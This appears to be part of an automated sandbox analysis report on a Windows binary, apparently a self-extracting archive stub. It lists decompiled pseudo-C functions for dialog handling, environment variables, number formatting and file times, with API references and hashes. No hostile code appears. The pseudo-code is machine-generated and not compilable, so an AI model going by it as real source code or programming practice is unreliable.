                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID: RENAMEDLG$REPLACEFILEDLG
                • API String ID: 0-56093855
                • Opcode ID: 8d1b9386bc134b11be9d80eb0ae3ed324dbaf97fd2e366575c400c0a929a2816
                • Instruction ID: 60952b21bc5eb11d0b99fde60e4e5991a52de935eac2566ee927873a4db609eb
                • Opcode Fuzzy Hash: 8d1b9386bc134b11be9d80eb0ae3ed324dbaf97fd2e366575c400c0a929a2816
                • Instruction Fuzzy Hash: 1A01B575604299AFDB129F96FC44A9B7FA9FB48354B104539F505D32B0DB308850DBA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E003D1316(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
                				struct HWND__* _t20;
                				struct HWND__* _t21;
                
                				if(_a8 == 0x30) {
                					E003DE2C1(0x411030, _a4);
                				} else {
                					_t27 = _a8 - 0x110;
                					if(_a8 == 0x110) {
                						E003DE2E8(0x411030, __edx, _t27, _a4, _a20, _a28 & 1);
                						if((_a28 & 0x00000001) != 0) {
                							_t20 =  *0x433154(_a4);
                							if(_t20 != 0) {
                								_t21 = GetDlgItem(_t20, 0x3021);
                								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
                									SetWindowTextW(_t21, 0x4035f4);
                								}
                							}
                						}
                					}
                				}
                				return 0;
                			}

                APIs
                  • Part of subcall function 003DE2E8: _swprintf.LIBCMT ref: 003DE30E
                  • Part of subcall function 003DE2E8: _strlen.LIBCMT ref: 003DE32F
                  • Part of subcall function 003DE2E8: SetDlgItemTextW.USER32(?,0040E274,?), ref: 003DE38F
                  • Part of subcall function 003DE2E8: GetWindowRect.USER32(?,?), ref: 003DE3C9
                  • Part of subcall function 003DE2E8: GetClientRect.USER32(?,?), ref: 003DE3D5
                • GetDlgItem.USER32(00000000,00003021), ref: 003D135A
                • SetWindowTextW.USER32(00000000,004035F4), ref: 003D1370
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ItemRectTextWindow$Client_strlen_swprintf
                • String ID: >$0
                • API String ID: 2622349952-1514486133
                • Opcode ID: 645cdbd41ef2e54f20b70c3fc2fef2407325123c4725652d178455543275b1ae
                • Instruction ID: ae3e5e7a92f068dd8d4ef74c2fcad9b06053ff7498738de14199bb6317b2d7fa
                • Opcode Fuzzy Hash: 645cdbd41ef2e54f20b70c3fc2fef2407325123c4725652d178455543275b1ae
                • Instruction Fuzzy Hash: 79F0AF3610438CBBEF171F60AC0DBEA3F58AF04346F058526FD4454AA1CBB8C990EA14
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 63%
                			E003EDBDE(void* __eflags, WCHAR* _a4) {
                				char _v8196;
                				WCHAR* _t8;
                				WCHAR* _t13;
                
                				E003EEC50(0x2000);
                				SetEnvironmentVariableW(L"sfxcmd", _a4);
                				_t8 = E003E0371(_a4,  &_v8196, 0x1000);
                				_t13 = _t8;
                				if(_t13 != 0) {
                					_push( *_t13 & 0x0000ffff);
                					while(E003E048D() != 0) {
                						_t13 =  &(_t13[1]);
                						_push( *_t13 & 0x0000ffff);
                					}
                					return SetEnvironmentVariableW(L"sfxpar", _t13);
                				}
                				return _t8;
                			}

                APIs
                • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 003EDBF4
                • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 003EDC30
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: EnvironmentVariable
                • String ID: sfxcmd$sfxpar
                • API String ID: 1431749950-3493335439
                • Opcode ID: 003d416803be72cc8055ca0e0ec2a6b718bc59d0368ee08b3253d3ce829295bd
                • Instruction ID: 8de0d06d6fc7c21430e2038fd159024c102378214b82c8792997dd18ab0df09c
                • Opcode Fuzzy Hash: 003d416803be72cc8055ca0e0ec2a6b718bc59d0368ee08b3253d3ce829295bd
                • Instruction Fuzzy Hash: A3F0A772404274A6CF222F968D06BEB3B5CEF08782B140561BD85AD0D1D6F48980DAB4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E003F9A1E(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				unsigned int _v20;
                				signed int _v28;
                				signed int _v32;
                				signed int _v36;
                				char _v40;
                				intOrPtr _v48;
                				char _v52;
                				void* __ebx;
                				void* __edi;
                				void* _t86;
                				signed int _t92;
                				signed int _t93;
                				signed int _t94;
                				signed int _t100;
                				void* _t101;
                				void* _t102;
                				void* _t104;
                				void* _t107;
                				void* _t109;
                				void* _t111;
                				void* _t115;
                				char* _t116;
                				void* _t119;
                				signed int _t121;
                				signed int _t128;
                				signed int* _t129;
                				signed int _t136;
                				signed int _t137;
                				char _t138;
                				signed int _t139;
                				signed int _t142;
                				signed int _t146;
                				signed int _t151;
                				char _t156;
                				char _t157;
                				void* _t161;
                				unsigned int _t162;
                				signed int _t164;
                				signed int _t166;
                				signed int _t170;
                				void* _t171;
                				signed int* _t172;
                				signed int _t174;
                				signed int _t181;
                				signed int _t182;
                				signed int _t183;
                				signed int _t184;
                				signed int _t185;
                				signed int _t186;
                				signed int _t187;
                
                				_t171 = __edx;
                				_t181 = _a24;
                				if(_t181 < 0) {
                					_t181 = 0;
                				}
                				_t184 = _a8;
                				 *_t184 = 0;
                				E003F4636(0,  &_v52, _t171, _a36);
                				_t5 = _t181 + 0xb; // 0xb
                				if(_a12 > _t5) {
                					_t172 = _a4;
                					_t142 = _t172[1];
                					_v36 =  *_t172;
                					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                						L11:
                						__eflags = _t142 & 0x80000000;
                						if((_t142 & 0x80000000) != 0) {
                							 *_t184 = 0x2d;
                							_t184 = _t184 + 1;
                							__eflags = _t184;
                						}
                						__eflags = _a28;
                						_v16 = 0x3ff;
                						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                						__eflags = _t172[1] & 0x7ff00000;
                						_v32 = _t136;
                						_t86 = 0x30;
                						if((_t172[1] & 0x7ff00000) != 0) {
                							 *_t184 = 0x31;
                							_t185 = _t184 + 1;
                							__eflags = _t185;
                						} else {
                							 *_t184 = _t86;
                							_t185 = _t184 + 1;
                							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                							__eflags = _t164;
                							if(_t164 != 0) {
                								_v16 = 0x3fe;
                							} else {
                								_v16 = _v16 & _t164;
                							}
                						}
                						_t146 = _t185;
                						_t186 = _t185 + 1;
                						_v28 = _t146;
                						__eflags = _t181;
                						if(_t181 != 0) {
                							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
                						} else {
                							 *_t146 = 0;
                						}
                						_t92 = _t172[1] & 0x000fffff;
                						__eflags = _t92;
                						_v20 = _t92;
                						if(_t92 > 0) {
                							L23:
                							_t33 =  &_v8;
                							 *_t33 = _v8 & 0x00000000;
                							__eflags =  *_t33;
                							_t147 = 0xf0000;
                							_t93 = 0x30;
                							_v12 = _t93;
                							_v20 = 0xf0000;
                							do {
                								__eflags = _t181;
                								if(_t181 <= 0) {
                									break;
                								}
                								_t119 = E003EEE10( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                								_t161 = 0x30;
                								_t121 = _t119 + _t161 & 0x0000ffff;
                								__eflags = _t121 - 0x39;
                								if(_t121 > 0x39) {
                									_t121 = _t121 + _t136;
                									__eflags = _t121;
                								}
                								_t162 = _v20;
                								_t172 = _a4;
                								 *_t186 = _t121;
                								_t186 = _t186 + 1;
                								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                								_t147 = _t162 >> 4;
                								_t93 = _v12 - 4;
                								_t181 = _t181 - 1;
                								_v20 = _t162 >> 4;
                								_v12 = _t93;
                								__eflags = _t93;
                							} while (_t93 >= 0);
                							__eflags = _t93;
                							if(_t93 < 0) {
                								goto L39;
                							}
                							_t115 = E003EEE10( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                							__eflags = _t115 - 8;
                							if(_t115 <= 8) {
                								goto L39;
                							}
                							_t54 = _t186 - 1; // 0x3f52a1
                							_t116 = _t54;
                							_t138 = 0x30;
                							while(1) {
                								_t156 =  *_t116;
                								__eflags = _t156 - 0x66;
                								if(_t156 == 0x66) {
                									goto L33;
                								}
                								__eflags = _t156 - 0x46;
                								if(_t156 != 0x46) {
                									_t139 = _v32;
                									__eflags = _t116 - _v28;
                									if(_t116 == _v28) {
                										_t57 = _t116 - 1;
                										 *_t57 =  *(_t116 - 1) + 1;
                										__eflags =  *_t57;
                									} else {
                										_t157 =  *_t116;
                										__eflags = _t157 - 0x39;
                										if(_t157 != 0x39) {
                											 *_t116 = _t157 + 1;
                										} else {
                											 *_t116 = _t139 + 0x3a;
                										}
                									}
                									goto L39;
                								}
                								L33:
                								 *_t116 = _t138;
                								_t116 = _t116 - 1;
                							}
                						} else {
                							__eflags =  *_t172;
                							if( *_t172 <= 0) {
                								L39:
                								__eflags = _t181;
                								if(_t181 > 0) {
                									_push(_t181);
                									_t111 = 0x30;
                									_push(_t111);
                									_push(_t186);
                									E003EFFF0(_t181);
                									_t186 = _t186 + _t181;
                									__eflags = _t186;
                								}
                								_t94 = _v28;
                								__eflags =  *_t94;
                								if( *_t94 == 0) {
                									_t186 = _t94;
                								}
                								__eflags = _a28;
                								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                								_t174 = _a4[1];
                								_t100 = E003EEE10( *_a4, 0x34, _t174);
                								_t137 = 0;
                								_t151 = (_t100 & 0x000007ff) - _v16;
                								__eflags = _t151;
                								asm("sbb ebx, ebx");
                								if(__eflags < 0) {
                									L47:
                									 *(_t186 + 1) = 0x2d;
                									_t187 = _t186 + 2;
                									__eflags = _t187;
                									_t151 =  ~_t151;
                									asm("adc ebx, 0x0");
                									_t137 =  ~_t137;
                									goto L48;
                								} else {
                									if(__eflags > 0) {
                										L46:
                										 *(_t186 + 1) = 0x2b;
                										_t187 = _t186 + 2;
                										L48:
                										_t182 = _t187;
                										_t101 = 0x30;
                										 *_t187 = _t101;
                										__eflags = _t137;
                										if(__eflags < 0) {
                											L56:
                											__eflags = _t187 - _t182;
                											if(_t187 != _t182) {
                												L60:
                												_push(0);
                												_push(0xa);
                												_push(_t137);
                												_push(_t151);
                												_t102 = E00402260();
                												_v32 = _t174;
                												 *_t187 = _t102 + 0x30;
                												_t187 = _t187 + 1;
                												__eflags = _t187;
                												L61:
                												_t104 = 0x30;
                												_t183 = 0;
                												__eflags = 0;
                												 *_t187 = _t151 + _t104;
                												 *(_t187 + 1) = 0;
                												goto L62;
                											}
                											__eflags = _t137;
                											if(__eflags < 0) {
                												goto L61;
                											}
                											if(__eflags > 0) {
                												goto L60;
                											}
                											__eflags = _t151 - 0xa;
                											if(_t151 < 0xa) {
                												goto L61;
                											}
                											goto L60;
                										}
                										if(__eflags > 0) {
                											L51:
                											_push(0);
                											_push(0x3e8);
                											_push(_t137);
                											_push(_t151);
                											_t107 = E00402260();
                											_v32 = _t174;
                											 *_t187 = _t107 + 0x30;
                											_t187 = _t187 + 1;
                											__eflags = _t187 - _t182;
                											if(_t187 != _t182) {
                												L55:
                												_push(0);
                												_push(0x64);
                												_push(_t137);
                												_push(_t151);
                												_t109 = E00402260();
                												_v32 = _t174;
                												 *_t187 = _t109 + 0x30;
                												_t187 = _t187 + 1;
                												__eflags = _t187;
                												goto L56;
                											}
                											L52:
                											__eflags = _t137;
                											if(__eflags < 0) {
                												goto L56;
                											}
                											if(__eflags > 0) {
                												goto L55;
                											}
                											__eflags = _t151 - 0x64;
                											if(_t151 < 0x64) {
                												goto L56;
                											}
                											goto L55;
                										}
                										__eflags = _t151 - 0x3e8;
                										if(_t151 < 0x3e8) {
                											goto L52;
                										}
                										goto L51;
                									}
                									__eflags = _t151;
                									if(_t151 < 0) {
                										goto L47;
                									}
                									goto L46;
                								}
                							}
                							goto L23;
                						}
                					}
                					__eflags = 0;
                					if(0 != 0) {
                						goto L11;
                					} else {
                						_t183 = E003F9D21(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                						__eflags = _t183;
                						if(_t183 == 0) {
                							_t128 = E00402430(_t184, 0x65);
                							_pop(_t166);
                							__eflags = _t128;
                							if(_t128 != 0) {
                								__eflags = _a28;
                								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                								__eflags = _t170;
                								 *_t128 = _t170;
                								 *((char*)(_t128 + 3)) = 0;
                							}
                							_t183 = 0;
                						} else {
                							 *_t184 = 0;
                						}
                						goto L62;
                					}
                				} else {
                					_t129 = E003F91A8();
                					_t183 = 0x22;
                					 *_t129 = _t183;
                					E003F9087();
                					L62:
                					if(_v40 != 0) {
                						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                					}
                					return _t183;
                				}
                			}

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: __alldvrm$_strrchr
                • String ID:
                • API String ID: 1036877536-0
                • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                • Instruction ID: b465e45cfd128809234f6e44bb79c42bbc82d6ec9c656b99e812ee81e0c15a22
                • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                • Instruction Fuzzy Hash: 9FA1267290438A9FEB27CF68C8917BEBBE5EF55310F2541AFE6859B281C2398D41C750
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E003DA354(void* __edx) {
                				signed char _t41;
                				void* _t42;
                				void* _t53;
                				signed char _t70;
                				void* _t78;
                				signed int* _t79;
                				signed int* _t80;
                				void* _t81;
                				signed int* _t82;
                				void* _t83;
                
                				_t78 = __edx;
                				E003EEC50(0x1024);
                				_t80 =  *(_t83 + 0x1038);
                				_t70 = 1;
                				if(_t80 == 0) {
                					L2:
                					 *(_t83 + 0x11) = 0;
                					L3:
                					_t79 =  *(_t83 + 0x1040);
                					if(_t79 == 0) {
                						L5:
                						 *(_t83 + 0x13) = 0;
                						L6:
                						_t82 =  *(_t83 + 0x1044);
                						if(_t82 == 0) {
                							L8:
                							 *(_t83 + 0x12) = 0;
                							L9:
                							_t41 = E003DA243( *(_t83 + 0x1038));
                							 *(_t83 + 0x18) = _t41;
                							if(_t41 == 0xffffffff || (_t70 & _t41) == 0) {
                								_t70 = 0;
                							} else {
                								E003DA4ED( *((intOrPtr*)(_t83 + 0x103c)), 0);
                							}
                							_t42 = CreateFileW( *(_t83 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
                							 *(_t83 + 0x14) = _t42;
                							if(_t42 != 0xffffffff) {
                								L16:
                								if( *(_t83 + 0x11) != 0) {
                									E003E138A(_t80, _t78, _t83 + 0x1c);
                								}
                								if( *(_t83 + 0x13) != 0) {
                									E003E138A(_t79, _t78, _t83 + 0x2c);
                								}
                								if( *(_t83 + 0x12) != 0) {
                									E003E138A(_t82, _t78, _t83 + 0x24);
                								}
                								_t81 =  *(_t83 + 0x14);
                								asm("sbb eax, eax");
                								asm("sbb eax, eax");
                								asm("sbb eax, eax");
                								SetFileTime(_t81,  ~( *(_t83 + 0x1b) & 0x000000ff) & _t83 + 0x00000030,  ~( *(_t83 + 0x16) & 0x000000ff) & _t83 + 0x00000024,  ~( *(_t83 + 0x11) & 0x000000ff) & _t83 + 0x0000001c);
                								_t53 = CloseHandle(_t81);
                								if(_t70 != 0) {
                									_t53 = E003DA4ED( *((intOrPtr*)(_t83 + 0x103c)),  *(_t83 + 0x18));
                								}
                								goto L24;
                							} else {
                								_t53 = E003DBB03( *(_t83 + 0x1040), _t83 + 0x38, 0x800);
                								if(_t53 == 0) {
                									L24:
                									return _t53;
                								}
                								_t53 = CreateFileW(_t83 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
                								 *(_t83 + 0x14) = _t53;
                								if(_t53 == 0xffffffff) {
                									goto L24;
                								}
                								goto L16;
                							}
                						}
                						 *(_t83 + 0x12) = _t70;
                						if(( *_t82 | _t82[1]) != 0) {
                							goto L9;
                						}
                						goto L8;
                					}
                					 *(_t83 + 0x13) = _t70;
                					if(( *_t79 | _t79[1]) != 0) {
                						goto L6;
                					}
                					goto L5;
                				}
                				 *(_t83 + 0x11) = 1;
                				if(( *_t80 | _t80[1]) != 0) {
                					goto L3;
                				}
                				goto L2;
                			}

                APIs
                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,003D7F69,?,?,?), ref: 003DA3FA
                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,003D7F69,?), ref: 003DA43E
                • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,003D7F69,?,?,?,?,?,?,?), ref: 003DA4BF
                • CloseHandle.KERNEL32(?,?,?,00000800,?,003D7F69,?,?,?,?,?,?,?,?,?,?), ref: 003DA4C6
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: File$Create$CloseHandleTime
                • String ID:
                • API String ID: 2287278272-0
                • Opcode ID: 47c900ea35d046b06a6e4af3e08331dbfe13329c12d1a6b7dc96df7d97649d6a
                • Instruction ID: d55a354ae050f49e067aeaaf600e319335b1548b2a3ae78f193ef0c008889710
                • Opcode Fuzzy Hash: 47c900ea35d046b06a6e4af3e08331dbfe13329c12d1a6b7dc96df7d97649d6a
                • Instruction Fuzzy Hash: E241C1322487819AD732DF25EE45FEEBBE99B85300F04091EF5D1972C0D6B49A48DB53
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E003FC988(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                				signed int _v8;
                				int _v12;
                				char _v16;
                				intOrPtr _v24;
                				char _v28;
                				void* _v40;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t34;
                				signed int _t40;
                				int _t46;
                				int _t54;
                				void* _t55;
                				int _t57;
                				signed int _t63;
                				int _t66;
                				short* _t67;
                				signed int _t68;
                				short* _t69;
                
                				_t65 = __edx;
                				_t34 =  *0x40e7ac; // 0xc24f6281
                				_v8 = _t34 ^ _t68;
                				E003F4636(_t55,  &_v28, __edx, _a4);
                				_t57 = _a24;
                				if(_t57 == 0) {
                					_t6 = _v24 + 8; // 0x2de85006
                					_t54 =  *_t6;
                					_t57 = _t54;
                					_a24 = _t54;
                				}
                				_t66 = 0;
                				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                				_v12 = _t40;
                				if(_t40 == 0) {
                					L15:
                					if(_v16 != 0) {
                						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                					}
                					return E003EFBBC(_t66, _t55, _v8 ^ _t68, _t65, _t66, _t67);
                				}
                				_t55 = _t40 + _t40;
                				asm("sbb eax, eax");
                				if((_t55 + 0x00000008 & _t40) == 0) {
                					_t67 = 0;
                					L11:
                					if(_t67 != 0) {
                						E003EFFF0(_t66, _t67, _t66, _t55);
                						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t67, _v12);
                						if(_t46 != 0) {
                							_t66 = GetStringTypeW(_a8, _t67, _t46, _a20);
                						}
                					}
                					L14:
                					E003FABC3(_t67);
                					goto L15;
                				}
                				asm("sbb eax, eax");
                				_t48 = _t40 & _t55 + 0x00000008;
                				_t63 = _t55 + 8;
                				if((_t40 & _t55 + 0x00000008) > 0x400) {
                					asm("sbb eax, eax");
                					_t67 = E003F8E06(_t63, _t48 & _t63);
                					if(_t67 == 0) {
                						goto L14;
                					}
                					 *_t67 = 0xdddd;
                					L9:
                					_t67 =  &(_t67[4]);
                					goto L11;
                				}
                				asm("sbb eax, eax");
                				E00402010(_t48 & _t63);
                				_t67 = _t69;
                				if(_t67 == 0) {
                					goto L14;
                				}
                				 *_t67 = 0xcccc;
                				goto L9;
                			}
























                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,003F47C6,00000000,00000000,003F57FB,?,003F57FB,?,00000001,003F47C6,2DE85006,00000001,003F57FB,003F57FB), ref: 003FC9D5
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003FCA5E
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 003FCA70
                • __freea.LIBCMT ref: 003FCA79
                  • Part of subcall function 003F8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,003F4286,?,0000015D,?,?,?,?,003F5762,000000FF,00000000,?,?), ref: 003F8E38
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                • String ID:
                • API String ID: 2652629310-0
                • Opcode ID: a6490302f8667a261611d96cf52e2aa011fd613b5516e82c185879fe8d501e3c
                • Instruction ID: 53af53c57c8460bd9a0ff6cfbd5712dab425bd6324bed0f3ab8282f6dff695e3
                • Opcode Fuzzy Hash: a6490302f8667a261611d96cf52e2aa011fd613b5516e82c185879fe8d501e3c
                • Instruction Fuzzy Hash: 1131CD72A1021EABDF26CF64CD41DBE7BA5EF41310B054268FD04EA290EB35DD50CB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E003EA663() {
                				struct HDC__* _t1;
                				struct HDC__* _t5;
                
                				_t1 = GetDC(0);
                				_t5 = _t1;
                				if(_t5 != 0) {
                					 *0x418430 = GetDeviceCaps(_t5, 0x58);
                					 *0x418434 = GetDeviceCaps(_t5, 0x5a);
                					return ReleaseDC(0, _t5);
                				}
                				return _t1;
                			}






                APIs
                • GetDC.USER32(00000000), ref: 003EA666
                • GetDeviceCaps.GDI32(00000000,00000058), ref: 003EA675
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003EA683
                • ReleaseDC.USER32(00000000,00000000), ref: 003EA691
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: CapsDevice$Release
                • String ID:
                • API String ID: 1035833867-0
                • Opcode ID: 8d87680e34a0a1a063b67c6b21ae8af8d5651cd79b4b1665ec50b520d8e92e57
                • Instruction ID: 390001908aff0f6bccaacaaff8e247e400558246bc035501656ff81cf5936932
                • Opcode Fuzzy Hash: 8d87680e34a0a1a063b67c6b21ae8af8d5651cd79b4b1665ec50b520d8e92e57
                • Instruction Fuzzy Hash: CDE08C31942B31A7C2251F60AC0DBCA3E24AB05B53F019120FA059A1D4EB6486008BA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 64%
                			E003ED06A(intOrPtr __ebx, long __edi) {
                				intOrPtr _t225;
                				void* _t226;
                				long _t289;
                				signed int _t290;
                				void* _t292;
                				signed int _t293;
                				void* _t297;
                
                				L0:
                				while(1) {
                					L0:
                					_t289 = __edi;
                					if(__ebx != 6) {
                						goto L175;
                					}
                					L133:
                					__eax = 0;
                					 *(__ebp - 0x2844) = __ax;
                					__eax =  *(__ebp - 0x1b894) & 0x0000ffff;
                					__eax = E003F79E9( *(__ebp - 0x1b894) & 0x0000ffff);
                					__eflags = __eax - 0x50;
                					if(__eax == 0x50) {
                						 *(__ebp - 0x14) = 2;
                						__eax = 0x42cb82;
                					} else {
                						__eflags = __eax - 0x54;
                						if(__eax == 0x54) {
                							 *(__ebp - 0x14) = 7;
                							__eax = 0x42bb82;
                						} else {
                							 *(__ebp - 0x14) = 0x10;
                							__eax = 0x42db82;
                						}
                					}
                					__esi = 0x800;
                					__ebp - 0x2844 = E003E0602(__ebp - 0x2844, __ebp - 0x2844, 0x800);
                					__eax = 0;
                					 *(__ebp - 0x9894) = __ax;
                					 *(__ebp - 0x1844) = __ax;
                					__ebp - 0x19894 = __ebp - 0x688c;
                					__eax = E003E0602(__ebp - 0x688c, __ebp - 0x19894, 0x800);
                					__ebx = 0x22;
                					__eflags =  *(__ebp - 0x688c) - __bx;
                					if( *(__ebp - 0x688c) != __bx) {
                						L141:
                						__ebp - 0x688c = E003DA231(__ebp - 0x688c);
                						__eflags = __al;
                						if(__al != 0) {
                							goto L160;
                						}
                						L142:
                						__ax =  *(__ebp - 0x688c);
                						__esi = __ebp - 0x688c;
